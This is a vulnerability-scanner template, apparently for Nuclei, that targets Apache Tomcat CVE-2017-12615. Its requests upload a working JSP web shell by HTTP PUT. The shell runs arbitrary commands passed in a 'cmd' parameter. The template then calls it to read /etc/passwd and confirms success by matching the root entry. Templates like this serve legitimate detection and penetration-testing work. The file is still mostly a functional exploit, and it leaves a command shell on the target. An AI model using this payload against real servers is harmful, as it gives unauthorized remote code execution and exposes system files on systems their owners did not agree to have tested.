id: CVE-2017-12615

info:
  name: Apache Tomcat RCE
  author: pikpikcu
  severity: high
  tags: cve,cve2017,apache,rce
  reference: https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
  description: |
    By design, you are not allowed to upload JSP files via the PUT method on Apache Tomcat servers. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79} Tomcat servers that have PUT enabled by sending a specially crafted HTTP PUT request to the Tomcat server.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.10
    cve-id: CVE-2017-12615
    cwe-id: CWE-434

requests:
  - method: PUT
    path:
      - "{{BaseURL}}/poc.jsp/"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: |
      <%@ page import="java.util.*,java.io.*"%>
      <%
      if (request.getParameter("cmd") != null) {
          out.println("Command: " + request.getParameter("cmd") + "\n");
          Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
          OutputStream os = p.getOutputStream();
          InputStream in = p.getInputStream();
          DataInputStream dis = new DataInputStream(in);
          String disr = dis.readLine();
          while ( disr != null ) {
              out.println(disr);
              disr = dis.readLine();
          }
      }
      %>

  - method: GET
    path:
      - "{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
        part: body

      - type: status
        status:
          - 200